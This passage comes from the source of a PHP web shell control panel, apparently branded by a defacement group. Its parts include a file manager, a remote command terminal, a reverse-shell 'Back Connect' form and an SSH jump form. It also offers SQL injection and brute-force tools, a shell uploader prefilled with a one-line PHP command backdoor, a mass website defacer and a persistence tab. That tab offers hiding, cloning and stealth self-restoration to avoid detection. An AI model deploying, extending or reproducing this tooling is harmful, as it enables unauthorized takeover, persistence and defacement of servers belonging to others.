                            </tr>
                        </thead>
                        <tbody>';

                if ($path != '/') {
                    $parentPath = dirname($path);
                    echo '<tr>
                            <td><a href="?path=' . urlencode($parentPath) . '" class="text-warning"><i class="fas fa-arrow-up"></i> ..</a></td>
                            <td>DIR</td>
                            <td>-</td>
                            <td>-</td>
                            <td>-</td>
                            <td>-</td>
                          </tr>';
                }

                foreach ($scandir as $item) {
                    if ($item == '.' || $item == '..') continue;
                    
                    $fullPath = $path . '/' . $item;
                    $isDir = is_dir($fullPath);
                    $size = $isDir ? '-' : formatBytes(filesize($fullPath));
                    $perms = substr(sprintf('%o', fileperms($fullPath)), -4);
                    $modified = date('Y-m-d H:i:s', filemtime($fullPath));
                    
                    echo '<tr>
                            <td>';
                    
                    if ($isDir) {
                        echo '<a href="?path=' . urlencode($fullPath) . '" class="text-info">
                                <i class="fas fa-folder"></i> ' . htmlspecialchars($item) . '
                              </a>';
                    } else {
                        echo '<i class="fas fa-file"></i> ' . htmlspecialchars($item);
                    }
                    
                    echo '</td>
                            <td>' . ($isDir ? 'DIR' : 'FILE') . '</td>
                            <td>' . $size . '</td>
                            <td>' . $perms . '</td>
                            <td>' . $modified . '</td>
                            <td>
                                <div class="btn-group" role="group">
                                    <button class="btn btn-sm btn-outline-info" onclick="editFileAdvanced(\'' . addslashes($fullPath) . '\')" title="Edit">
                                        <i class="fas fa-edit"></i>
                                    </button>
                                    <button class="btn btn-sm btn-outline-warning" onclick="renameItem(\'' . addslashes($fullPath) . '\', \'' . addslashes($item) . '\')" title="Rename">
                                        <i class="fas fa-signature"></i>
                                    </button>
                                    <button class="btn btn-sm btn-outline-primary" onclick="changePermissions(\'' . addslashes($fullPath) . '\', \'' . $perms . '\')" title="Permissions">
                                        <i class="fas fa-key"></i>
                                    </button>
                                    <button class="btn btn-sm btn-outline-secondary" onclick="changeTimestamp(\'' . addslashes($fullPath) . '\', \'' . $modified . '\')" title="Date">
                                        <i class="fas fa-clock"></i>
                                    </button>
                                    <button class="btn btn-sm btn-outline-danger" onclick="deleteItem(\'' . addslashes($fullPath) . '\')" title="Delete">
                                        <i class="fas fa-trash"></i>
                                    </button>
                                </div>
                            </td>
                          </tr>';
                }
                
                echo '</tbody></table></div>';
            }
            
            function formatBytes($size, $precision = 2) {
                $units = array('B', 'KB', 'MB', 'GB', 'TB');
                for ($i = 0; $size > 1024 && $i < count($units) - 1; $i++) {
                    $size /= 1024;
                }
                return round($size, $precision) . ' ' . $units[$i];
            }
            ?>
        </div>

        <!-- Terminal Tab -->
        <div class="tab-pane fade" id="terminal" role="tabpanel">
            <h4><i class="fas fa-terminal"></i> Terminal</h4>
            
            <form method="POST" id="terminalForm">
                <div class="form-group">
                    <label>Working Directory:</label>
                    <input type="text" name="terminal_path" value="<?php echo htmlspecialchars($path); ?>" class="form-control-tools">
                </div>
                <div class="form-group">
                    <label>Command:</label>
                    <input type="text" name="terminal_cmd" id="terminal_cmd" class="form-control-tools" placeholder="Enter command..." autocomplete="off">
                </div>
                <button type="submit" class="btn-tool-action">
                    <i class="fas fa-play"></i> Execute
                </button>
            </form>

            <?php if (isset($output) || isset($error)): ?>
            <div class="terminal-output">
                <strong>$ <?php echo htmlspecialchars($command ?? ''); ?></strong><br>
                <?php if (!empty($output)): ?>
                    <?php echo htmlspecialchars($output); ?>
                <?php endif; ?>
                <?php if (!empty($error)): ?>
                    <span style="color: #ff6666;"><?php echo htmlspecialchars($error); ?></span>
                <?php endif; ?>
            </div>
            <?php endif; ?>

            <div class="mt-3">
                <h5>Quick Commands:</h5>
                <div class="row">
                    <div class="col-md-6">
                        <button class="btn btn-outline-warning btn-sm mb-2" onclick="setCommand('ls -la')">
                            <i class="fas fa-list"></i> List Files
                        </button><br>
                        <button class="btn btn-outline-warning btn-sm mb-2" onclick="setCommand('pwd')">
                            <i class="fas fa-map-marker-alt"></i> Current Directory
                        </button><br>
                        <button class="btn btn-outline-warning btn-sm mb-2" onclick="setCommand('whoami')">
                            <i class="fas fa-user"></i> Current User
                        </button><br>
                        <button class="btn btn-outline-warning btn-sm mb-2" onclick="setCommand('ps aux')">
                            <i class="fas fa-tasks"></i> Running Processes
                        </button>
                    </div>
                    <div class="col-md-6">
                        <button class="btn btn-outline-warning btn-sm mb-2" onclick="setCommand('df -h')">
                            <i class="fas fa-hdd"></i> Disk Usage
                        </button><br>
                        <button class="btn btn-outline-warning btn-sm mb-2" onclick="setCommand('uname -a')">
                            <i class="fas fa-server"></i> System Info
                        </button><br>
                        <button class="btn btn-outline-warning btn-sm mb-2" onclick="setCommand('netstat -tlnp')">
                            <i class="fas fa-network-wired"></i> Network
                        </button><br>
                        <button class="btn btn-outline-warning btn-sm mb-2" onclick="setCommand('cat /etc/passwd')">
                            <i class="fas fa-users"></i> Users
                        </button>
                    </div>
                </div>
            </div>
        </div>

        <!-- Security Tools Tab -->
        <div class="tab-pane fade" id="security" role="tabpanel">
            <h4><i class="fas fa-shield-alt"></i> Security Tools</h4>
            
            <div class="tool-grid">
                <div class="tool-card" onclick="showSecurityTool('encoder')">
                    <div class="tool-icon"><i class="fas fa-key"></i></div>
                    <div class="tool-name">En/Decoder</div>
                    <div class="tool-desc">Encode/decode text data</div>
                </div>
                
                <div class="tool-card" onclick="showSecurityTool('hasher')">
                    <div class="tool-icon"><i class="fas fa-hashtag"></i></div>
                    <div class="tool-name">Hash Tools</div>
                    <div class="tool-desc">Generate/crack hashes</div>
                </div>
                
                <div class="tool-card" onclick="showSecurityTool('portscanner')">
                    <div class="tool-icon"><i class="fas fa-search"></i></div>
                    <div class="tool-name">Port Scanner</div>
                    <div class="tool-desc">Scan open ports</div>
                </div>
                
                <div class="tool-card" onclick="showSecurityTool('whois')">
                    <div class="tool-icon"><i class="fas fa-info-circle"></i></div>
                    <div class="tool-name">WHOIS Lookup</div>
                    <div class="tool-desc">Domain information</div>
                </div>
                
                <div class="tool-card" onclick="showSecurityTool('sqli')">
                    <div class="tool-icon"><i class="fas fa-bug"></i></div>
                    <div class="tool-name">SQL Injector</div>
                    <div class="tool-desc">SQL injection testing</div>
                </div>
                
                <div class="tool-card" onclick="showSecurityTool('bruteforce')">
                    <div class="tool-icon"><i class="fas fa-hammer"></i></div>
                    <div class="tool-name">BruteForcer</div>
                    <div class="tool-desc">Password attacks</div>
                </div>
                
                <div class="tool-card" onclick="showSecurityTool('reverse_ip')">
                    <div class="tool-icon"><i class="fas fa-globe"></i></div>
                    <div class="tool-name">Reverse IP</div>
                    <div class="tool-desc">IP to hostname lookup</div>
                </div>
                
                <div class="tool-card" onclick="showSecurityTool('subdomain')">
                    <div class="tool-icon"><i class="fas fa-sitemap"></i></div>
                    <div class="tool-name">Subdomain Scanner</div>
                    <div class="tool-desc">Find subdomains</div>
                </div>
                
                <div class="tool-card" onclick="showSecurityTool('cms_detect')">
                    <div class="tool-icon"><i class="fas fa-cogs"></i></div>
                    <div class="tool-name">CMS Detector</div>
                    <div class="tool-desc">Identify CMS platforms</div>
                </div>
                
                <div class="tool-card" onclick="showSecurityTool('admin_finder')">
                    <div class="tool-icon"><i class="fas fa-user-shield"></i></div>
                    <div class="tool-name">Admin Panel Finder</div>
                    <div class="tool-desc">Locate admin panels</div>
                </div>
                
                <div class="tool-card" onclick="showSecurityTool('file_uploader')">
                    <div class="tool-icon"><i class="fas fa-upload"></i></div>
                    <div class="tool-name">Shell Uploader</div>
                    <div class="tool-desc">Upload web shells</div>
                </div>
                
                <div class="tool-card" onclick="showSecurityTool('mass_deface')">
                    <div class="tool-icon"><i class="fas fa-code"></i></div>
                    <div class="tool-name">Mass Defacer</div>
                    <div class="tool-desc">Mass website defacement</div>
                </div>
            </div>

            <div id="security-tools-container" class="security-tools-container">
                <!-- Dynamic tool content will be loaded here -->
            </div>
        </div>

        <!-- Network Tools Tab -->
        <div class="tab-pane fade" id="network" role="tabpanel">
            <h4><i class="fas fa-network-wired"></i> Network Tools</h4>
            
            <div class="row">
                <div class="col-md-6">
                    <div class="tool-form">
                        <h5><i class="fas fa-link"></i> Back Connect</h5>
                        <form method="POST">
                            <div class="form-group">
                                <label>Host:</label>
                                <input type="text" name="back_host" class="form-control-tools" placeholder="Your IP">
                            </div>
                            <div class="form-group">
                                <label>Port:</label>
                                <input type="number" name="back_port" class="form-control-tools" placeholder="4444">
                            </div>
                            <div class="form-group">
                                <label>Method:</label>
                                <select name="back_type" class="form-control-tools">
                                    <option value="bash">Bash</option>
                                    <option value="perl">Perl</option>
                                    <option value="python">Python</option>
                                    <option value="nc">Netcat</option>
                                </select>
                            </div>
                            <button type="submit" name="back_connect" class="btn-tool-action">
                                <i class="fas fa-link"></i> Connect
                            </button>
                        </form>
                    </div>
                </div>
                
                <div class="col-md-6">
                    <div class="tool-form">
                        <h5><i class="fas fa-server"></i> Jump Server</h5>
                        <form method="POST">
                            <div class="form-group">
                                <label>Target Host:</label>
                                <input type="text" name="jump_host" class="form-control-tools" placeholder="target.com">
                            </div>
                            <div class="form-group">
                                <label>Port:</label>
                                <input type="number" name="jump_port" class="form-control-tools" value="22">
                            </div>
                            <div class="form-group">
                                <label>Username:</label>
                                <input type="text" name="jump_user" class="form-control-tools" placeholder="root">
                            </div>
                            <div class="form-group">
                                <label>Password:</label>
                                <input type="password" name="jump_pass" class="form-control-tools">
                            </div>
                            <button type="submit" name="jump_server" class="btn-tool-action">
                                <i class="fas fa-server"></i> Connect
                            </button>
                        </form>
                    </div>
                </div>
            </div>
        </div>

        <!-- System Info Tab -->
        <div class="tab-pane fade" id="info" role="tabpanel">
            <h4><i class="fas fa-info-circle"></i> System Information</h4>
            
            <div class="row">
                <div class="col-md-6">
                    <h5><i class="fas fa-server"></i> Server Info</h5>
                    <pre><?php
                    echo "PHP Version: " . phpversion() . "\n";
                    echo "Server Software: " . $_SERVER['SERVER_SOFTWARE'] . "\n";
                    echo "Document Root: " . $_SERVER['DOCUMENT_ROOT'] . "\n";
                    echo "Server Admin: " . ($_SERVER['SERVER_ADMIN'] ?? 'N/A') . "\n";
                    echo "Server Port: " . $_SERVER['SERVER_PORT'] . "\n";
                    echo "Operating System: " . php_uname() . "\n";
                    echo "Current User: " . get_current_user() . "\n";
                    echo "Current UID: " . getmyuid() . "\n";
                    echo "Current GID: " . getmygid() . "\n";
                    echo "Script Path: " . __FILE__ . "\n";
                    ?></pre>
                </div>
                
                <div class="col-md-6">
                    <h5><i class="fas fa-cogs"></i> PHP Configuration</h5>
                    <pre><?php
                    echo "Safe Mode: " . (ini_get('safe_mode') ? 'ON' : 'OFF') . "\n";
                    echo "Open Basedir: " . (ini_get('open_basedir') ?: 'None') . "\n";
                    echo "Disabled Functions: " . (ini_get('disable_functions') ?: 'None') . "\n";
                    echo "Max Execution Time: " . ini_get('max_execution_time') . "s\n";
                    echo "Memory Limit: " . ini_get('memory_limit') . "\n";
                    echo "Upload Max Filesize: " . ini_get('upload_max_filesize') . "\n";
                    echo "Post Max Size: " . ini_get('post_max_size') . "\n";
                    ?></pre>
                </div>
            </div>
        </div>
        
        <!-- Auto Recovery Tab -->
        <div class="tab-pane fade" id="recovery" role="tabpanel">
            <h4><i class="fas fa-shield-virus"></i> Auto Recovery System</h4>
            <p class="text-warning">Advanced shell protection and auto-recovery mechanisms</p>
            
            <div class="row">
                <div class="col-md-6">
                    <div class="card bg-dark border-warning mb-3">
                        <div class="card-header bg-warning text-dark">
                            <i class="fas fa-shield-alt"></i> Shell Protection Status
                        </div>
                        <div class="card-body">
                            <div class="recovery-status">
                                <p><i class="fas fa-check-circle text-success"></i> Auto-Recovery: <span class="text-success">ACTIVE</span></p>
                                <p><i class="fas fa-lock text-warning"></i> Self-Protection: <span class="text-warning">ENABLED</span></p>
                                <p><i class="fas fa-backup text-info"></i> Backup System: <span class="text-info">RUNNING</span></p>
                                <p><i class="fas fa-eye text-primary"></i> Monitor Status: <span class="text-primary">WATCHING</span></p>
                            </div>
                            
                            <div class="mt-3">
                                <button class="btn btn-success btn-sm" onclick="enableRecovery()">
                                    <i class="fas fa-power-off"></i> Enable Protection
                                </button>
                                <button class="btn btn-warning btn-sm" onclick="testRecovery()">
                                    <i class="fas fa-vial"></i> Test Recovery
                                </button>
                            </div>
                        </div>
                    </div>
                </div>
                
                <div class="col-md-6">
                    <div class="card bg-dark border-info mb-3">
                        <div class="card-header bg-info text-dark">
                            <i class="fas fa-cogs"></i> Recovery Configuration
                        </div>
                        <div class="card-body">
                            <form method="POST" id="recoveryForm">
                                <input type="hidden" name="recovery_action" value="configure">
                                
                                <div class="form-group">
                                    <label>Backup Location:</label>
                                    <input type="text" name="backup_path" class="form-control-tools" value="/tmp/.backup_shell" readonly>
                                </div>
                                
                                <div class="form-group">
                                    <label>Monitor Interval (seconds):</label>
                                    <select name="monitor_interval" class="form-control-tools">
                                        <option value="30">30 seconds</option>
                                        <option value="60" selected>1 minute</option>
                                        <option value="300">5 minutes</option>
                                        <option value="600">10 minutes</option>
                                    </select>
                                </div>
                                
                                <div class="form-group">
                                    <label>Recovery Method:</label>
                                    <select name="recovery_method" class="form-control-tools">
                                        <option value="instant" selected>Instant Recovery</option>
                                        <option value="delayed">Delayed Recovery</option>
                                        <option value="stealth">Stealth Recovery</option>
                                    </select>
                                </div>
                                
                                <button type="submit" class="btn-tool-action">
                                    <i class="fas fa-save"></i> Update Config
                                </button>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
            
            <div class="row">
                <div class="col-12">
                    <div class="card bg-dark border-danger">
                        <div class="card-header bg-danger text-white">
                            <i class="fas fa-exclamation-triangle"></i> Recovery Tools
                        </div>
                        <div class="card-body">
                            <div class="tool-grid">
                                <div class="tool-card" onclick="createBackup()">
                                    <h6><i class="fas fa-save"></i> Create Backup</h6>
                                    <p>Manually create shell backup</p>
                                </div>
                                
                                <div class="tool-card" onclick="restoreFromBackup()">
                                    <h6><i class="fas fa-undo"></i> Restore Shell</h6>
                                    <p>Restore from backup file</p>
                                </div>
                                
                                <div class="tool-card" onclick="hideShell()">
                                    <h6><i class="fas fa-eye-slash"></i> Hide Shell</h6>
                                    <p>Make shell invisible</p>
                                </div>
                                
                                <div class="tool-card" onclick="cloneShell()">
                                    <h6><i class="fas fa-clone"></i> Clone Shell</h6>
                                    <p>Create multiple copies</p>
                                </div>
                                
                                <div class="tool-card" onclick="protectShell()">
                                    <h6><i class="fas fa-lock"></i> Protect File</h6>
                                    <p>Set immutable attributes</p>
                                </div>
                                
                                <div class="tool-card" onclick="generateRecoveryCode()">
                                    <h6><i class="fas fa-key"></i> Recovery Code</h6>
                                    <p>Generate recovery script</p>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            
            <div class="mt-3">
                <div class="alert alert-info">
                    <h6><i class="fas fa-info-circle"></i> Recovery System Features:</h6>
                    <ul class="mb-0">
                        <li>Automatic file restoration when deleted</li>
                        <li>Multiple backup locations for redundancy</li>
                        <li>Stealth mode to avoid detection</li>
                        <li>Self-healing mechanisms</li>
                        <li>Process monitoring and restart</li>
                        <li>File permission protection</li>
                    </ul>
                </div>
            </div>
        </div>
    </div>
</div>

<!-- 3D Anonymous Character -->
<div class="anonymous-3d" onclick="showAnonymousMessage()">
    <div class="anonymous-face">
        <div class="anonymous-mask">
            <div class="anonymous-eyes">
                <div class="eye left"></div>
                <div class="eye right"></div>
            </div>
            <div class="anonymous-mouth"></div>
        </div>
    </div>
</div>

<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.2/dist/js/bootstrap.bundle.min.js"></script>
<script>
function setCommand(cmd) {
    document.getElementById('terminal_cmd').value = cmd;
    document.getElementById('terminal_cmd').focus();
}

function showSecurityTool(toolName) {
    const container = document.getElementById('security-tools-container');
    container.style.display = 'block';
    
    let toolContent = '';
    
    switch(toolName) {
        case 'encoder':
            toolContent = `
                <div class="tool-form">
                    <h5><i class="fas fa-key"></i> En/Decoder Tool</h5>
                    <div class="form-group">
                        <label>Input Text:</label>
                        <textarea name="input_text" class="form-control-tools" rows="5" placeholder="Enter text to encode/decode"></textarea>
                    </div>
                    <div class="checkbox-group">
                        <label><input type="radio" name="encode_type" value="base64" checked> Base64</label>
                        <label><input type="radio" name="encode_type" value="url"> URL Encode</label>
                        <label><input type="radio" name="encode_type" value="html"> HTML Entities</label>
                        <label><input type="radio" name="encode_type" value="hex"> Hex</label>
                        <label><input type="radio" name="encode_type" value="rot13"> ROT13</label>
                    </div>
                    <button type="button" class="btn-tool-action" onclick="encodeText()">
                        <i class="fas fa-lock"></i> Encode
                    </button>
                    <button type="button" class="btn-tool-action" onclick="decodeText()">
                        <i class="fas fa-unlock"></i> Decode
                    </button>
                    <div class="tool-results" id="encoder-results">Select encoding type and enter text...</div>
                </div>
            `;
            break;
            
        case 'hasher':
            toolContent = `
                <div class="tool-form">
                    <h5><i class="fas fa-hashtag"></i> Hash Tools</h5>
                    <div class="form-group">
                        <label>Input Text:</label>
                        <textarea name="hash_input" class="form-control-tools" rows="4" placeholder="Enter text or hash"></textarea>
                    </div>
                    <div class="checkbox-group">
                        <label><input type="radio" name="hash_type" value="md5" checked> MD5</label>
                        <label><input type="radio" name="hash_type" value="sha1"> SHA1</label>
                        <label><input type="radio" name="hash_type" value="sha256"> SHA256</label>
                        <label><input type="radio" name="hash_type" value="sha512"> SHA512</label>
                    </div>
                    <button type="button" class="btn-tool-action" onclick="generateHash()">
                        <i class="fas fa-key"></i> Generate Hash
                    </button>
                    <div class="tool-results" id="hasher-results">Ready to generate hashes...</div>
                </div>
            `;
            break;
            
        case 'portscanner':
            toolContent = `
                <div class="tool-form">
                    <h5><i class="fas fa-search"></i> Port Scanner</h5>
                    <div class="form-group">
                        <label>Target Host:</label>
                        <input type="text" name="target_host" class="form-control-tools" placeholder="192.168.1.1 or domain.com">
                    </div>
                    <div class="form-group">
                        <label>Port Range:</label>
                        <input type="text" name="port_range" class="form-control-tools" value="1-1000" placeholder="80,443,22 or 1-1000">
                    </div>
                    <button type="button" class="btn-tool-action" onclick="scanPorts()">
                        <i class="fas fa-search"></i> Start Scan
                    </button>
                    <div class="tool-results" id="portscanner-results">Ready to scan ports...</div>
                </div>
            `;
            break;
            
        case 'whois':
            toolContent = `
                <div class="tool-form">
                    <h5><i class="fas fa-info-circle"></i> WHOIS Lookup</h5>
                    <div class="form-group">
                        <label>Domain/IP:</label>
                        <input type="text" name="target" class="form-control-tools" placeholder="example.com or 8.8.8.8">
                    </div>
                    <button type="button" class="btn-tool-action" onclick="whoisLookup()">
                        <i class="fas fa-search"></i> Lookup
                    </button>
                    <div class="tool-results" id="whois-results">Ready to perform WHOIS lookup...</div>
                </div>
            `;
            break;
            
        case 'sqli':
            toolContent = `
                <div class="tool-form">
                    <h5><i class="fas fa-bug"></i> SQL Injection Tester</h5>
                    <div class="form-group">
                        <label>Target URL:</label>
                        <input type="text" name="target_url" class="form-control-tools" placeholder="http://target.com/page.php">
                    </div>
                    <div class="form-group">
                        <label>SQL Payload:</label>
                        <input type="text" name="sql_payload" class="form-control-tools" value="' OR '1'='1" placeholder="' OR '1'='1">
                    </div>
                    <button type="button" class="btn-tool-action" onclick="testSQLI()">
                        <i class="fas fa-bug"></i> Test SQL Injection
                    </button>
                    <div class="tool-results" id="sqli-results">Ready to test for SQL injection vulnerabilities...</div>
                </div>
            `;
            break;
            
        case 'bruteforce':
            toolContent = `
                <div class="tool-form">
                    <h5><i class="fas fa-hammer"></i> Brute Force Attack</h5>
                    <div class="form-group">
                        <label>Target URL:</label>
                        <input type="text" name="target_url" class="form-control-tools" placeholder="http://target.com/login.php">
                    </div>
                    <div class="form-group">
                        <label>Username:</label>
                        <input type="text" name="username" class="form-control-tools" value="admin" placeholder="admin">
                    </div>
                    <div class="form-group">
                        <label>Password Wordlist:</label>
                        <textarea name="wordlist" class="form-control-tools" rows="6" placeholder="admin\npassword\n123456\nroot\ntest">admin\npassword\n123456\nroot\ntest\nadministrator\nlogin\npass\n12345\nqwerty</textarea>
                    </div>
                    <button type="button" class="btn-tool-action" onclick="startBruteForce()">
                        <i class="fas fa-hammer"></i> Start Attack
                    </button>
                    <div class="tool-results" id="bruteforce-results">Ready to start brute force attack...</div>
                </div>
            `;
            break;
            
        case 'reverse_ip':
            toolContent = `
                <div class="tool-form">
                    <h5><i class="fas fa-globe"></i> Reverse IP Lookup</h5>
                    <div class="form-group">
                        <label>IP Address:</label>
                        <input type="text" name="target_ip" class="form-control-tools" placeholder="8.8.8.8">
                    </div>
                    <button type="button" class="btn-tool-action" onclick="reverseIPLookup()">
                        <i class="fas fa-search"></i> Lookup
                    </button>
                    <div class="tool-results" id="reverse-ip-results">Ready to perform reverse IP lookup...</div>
                </div>
            `;
            break;
            
        case 'subdomain':
            toolContent = `
                <div class="tool-form">
                    <h5><i class="fas fa-sitemap"></i> Subdomain Scanner</h5>
                    <div class="form-group">
                        <label>Target Domain:</label>
                        <input type="text" name="target_domain" class="form-control-tools" placeholder="example.com">
                    </div>
                    <button type="button" class="btn-tool-action" onclick="scanSubdomains()">
                        <i class="fas fa-search"></i> Scan Subdomains
                    </button>
                    <div class="tool-results" id="subdomain-results">Ready to scan for subdomains...</div>
                </div>
            `;
            break;
            
        case 'cms_detect':
            toolContent = `
                <div class="tool-form">
                    <h5><i class="fas fa-cogs"></i> CMS Detection</h5>
                    <div class="form-group">
                        <label>Target URL:</label>
                        <input type="text" name="target_url" class="form-control-tools" placeholder="http://target.com">
                    </div>
                    <button type="button" class="btn-tool-action" onclick="detectCMS()">
                        <i class="fas fa-search"></i> Detect CMS
                    </button>
                    <div class="tool-results" id="cms-results">Ready to detect CMS platform...</div>
                </div>
            `;
            break;
            
        case 'admin_finder':
            toolContent = `
                <div class="tool-form">
                    <h5><i class="fas fa-user-shield"></i> Admin Panel Finder</h5>
                    <div class="form-group">
                        <label>Target URL:</label>
                        <input type="text" name="target_url" class="form-control-tools" placeholder="http://target.com">
                    </div>
                    <button type="button" class="btn-tool-action" onclick="findAdminPanel()">
                        <i class="fas fa-search"></i> Find Admin Panel
                    </button>
                    <div class="tool-results" id="admin-results">Ready to search for admin panels...</div>
                </div>
            `;
            break;
            
        case 'file_uploader':
            toolContent = `
                <div class="tool-form">
                    <h5><i class="fas fa-upload"></i> Shell Uploader</h5>
                    <div class="form-group">
                        <label>Shell Content:</label>
                        <textarea name="shell_content" class="form-control-tools" rows="8">&lt;?php system($_GET['cmd']); ?&gt;</textarea>
                    </div>
                    <div class="form-group">
                        <label>File Name:</label>
                        <input type="text" name="shell_name" class="form-control-tools" value="shell.php" placeholder="shell.php">
                    </div>
                    <button type="button" class="btn-tool-action" onclick="uploadShell()">
                        <i class="fas fa-upload"></i> Create Shell
                    </button>
                    <div class="tool-results" id="uploader-results">Ready to create web shell...</div>
                </div>
            `;
            break;
            
        case 'mass_deface':
            toolContent = `
                <div class="tool-form">
                    <h5><i class="fas fa-code"></i> Mass Defacer</h5>
                    <div class="form-group">
                        <label>Defacement Content:</label>
                        <textarea name="deface_content" class="form-control-tools" rows="6"><!DOCTYPE html>
<html>
<head><title>Hacked by 7SYNDIACTE</title></head>
<body style="background:#000;color:#e1b12c;text-align:center;padding:50px;">
<h1>Hacked by 7SYNDIACTE</h1>
<p>We Are Anonymous, We Are Legion</p>
</body>
</html></textarea>
                    </div>
                    <div class="form-group">
                        <label>Target Files (one per line):</label>
                        <textarea name="target_files" class="form-control-tools" rows="4" placeholder="index.html\nindex.php\nhome.html">index.html\nindex.php\nhome.html</textarea>
                    </div>
                    <button type="button" class="btn-tool-action" onclick="massDeface()">
                        <i class="fas fa-code"></i> Start Defacement
                    </button>
                    <div class="tool-results" id="deface-results">Ready to start mass defacement...</div>
                </div>
            `;
            break;
            
        default:
            toolContent = `
                <div class="tool-form">
                    <h5><i class="fas fa-cog"></i> ${toolName.charAt(0).toUpperCase() + toolName.slice(1)}</h5>
                    <p>This tool is under development. Advanced functionality will be available soon.</p>
                    <div class="tool-results">Tool: ${toolName} - Implementation in progress</div>
                </div>
            `;
    }
    
    container.innerHTML = toolContent;
}

function encodeText() {
    const text = document.querySelector('textarea[name="input_text"]').value;
    const type = document.querySelector('input[name="encode_type"]:checked').value;
    
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            document.getElementById('encoder-results').textContent = response.result;
        }
    };
    xhr.send('tool_action=encode&input_text=' + encodeURIComponent(text) + '&encode_type=' + type);
}

function decodeText() {
    const text = document.querySelector('textarea[name="input_text"]').value;
    const type = document.querySelector('input[name="encode_type"]:checked').value;
    
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            document.getElementById('encoder-results').textContent = response.result;
        }
    };
    xhr.send('tool_action=decode&input_text=' + encodeURIComponent(text) + '&encode_type=' + type);
}

function generateHash() {
    const text = document.querySelector('textarea[name="hash_input"]').value;
    const type = document.querySelector('input[name="hash_type"]:checked').value;
    
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            document.getElementById('hasher-results').textContent = response.result;
        }
    };
    xhr.send('tool_action=hash&input_text=' + encodeURIComponent(text) + '&hash_type=' + type);
}

function scanPorts() {
    const host = document.querySelector('input[name="target_host"]').value;
    const ports = document.querySelector('input[name="port_range"]').value;
    
    if (!host) {
        document.getElementById('portscanner-results').textContent = 'Please enter a target host';
        return;
    }
    
    document.getElementById('portscanner-results').textContent = 'Scanning ports...';
    
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            document.getElementById('portscanner-results').textContent = response.result;
        }
    };
    xhr.send('tool_action=port_scan&target_host=' + encodeURIComponent(host) + '&port_range=' + encodeURIComponent(ports));
}

function whoisLookup() {
    const target = document.querySelector('input[name="target"]').value;
    
    if (!target) {
        document.getElementById('whois-results').textContent = 'Please enter a domain or IP';
        return;
    }
    
    document.getElementById('whois-results').textContent = 'Performing WHOIS lookup...';
    
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            document.getElementById('whois-results').textContent = response.result;
        }
    };
    xhr.send('tool_action=whois&target=' + encodeURIComponent(target));
}

// New security tool functions
function testSQLI() {
    const url = document.querySelector('input[name="target_url"]').value;
    const payload = document.querySelector('input[name="sql_payload"]').value;
    
    if (!url) {
        document.getElementById('sqli-results').textContent = 'Please enter a target URL';
        return;
    }
    
    document.getElementById('sqli-results').textContent = 'Testing SQL injection...';
    
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            document.getElementById('sqli-results').textContent = response.result;
        }
    };
    xhr.send('tool_action=sql_injection&target_url=' + encodeURIComponent(url) + '&sql_payload=' + encodeURIComponent(payload));
}

function startBruteForce() {
    const url = document.querySelector('input[name="target_url"]').value;
    const username = document.querySelector('input[name="username"]').value;
    const wordlist = document.querySelector('textarea[name="wordlist"]').value;
    
    if (!url) {
        document.getElementById('bruteforce-results').textContent = 'Please enter a target URL';
        return;
    }
    
    document.getElementById('bruteforce-results').textContent = 'Starting brute force attack...';
    
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            document.getElementById('bruteforce-results').textContent = response.result;
        }
    };
    xhr.send('tool_action=bruteforce&target_url=' + encodeURIComponent(url) + '&username=' + encodeURIComponent(username) + '&wordlist=' + encodeURIComponent(wordlist));
}

function reverseIPLookup() {
    const ip = document.querySelector('input[name="target_ip"]').value;
    
    if (!ip) {
        document.getElementById('reverse-ip-results').textContent = 'Please enter an IP address';
        return;
    }
    
    document.getElementById('reverse-ip-results').textContent = 'Performing reverse IP lookup...';
    
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            document.getElementById('reverse-ip-results').textContent = response.result;
        }
    };
    xhr.send('tool_action=reverse_ip&target_ip=' + encodeURIComponent(ip));
}

function scanSubdomains() {
    const domain = document.querySelector('input[name="target_domain"]').value;
    
    if (!domain) {
        document.getElementById('subdomain-results').textContent = 'Please enter a domain';
        return;
    }
    
    document.getElementById('subdomain-results').textContent = 'Scanning for subdomains...';
    
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            document.getElementById('subdomain-results').textContent = response.result;
        }
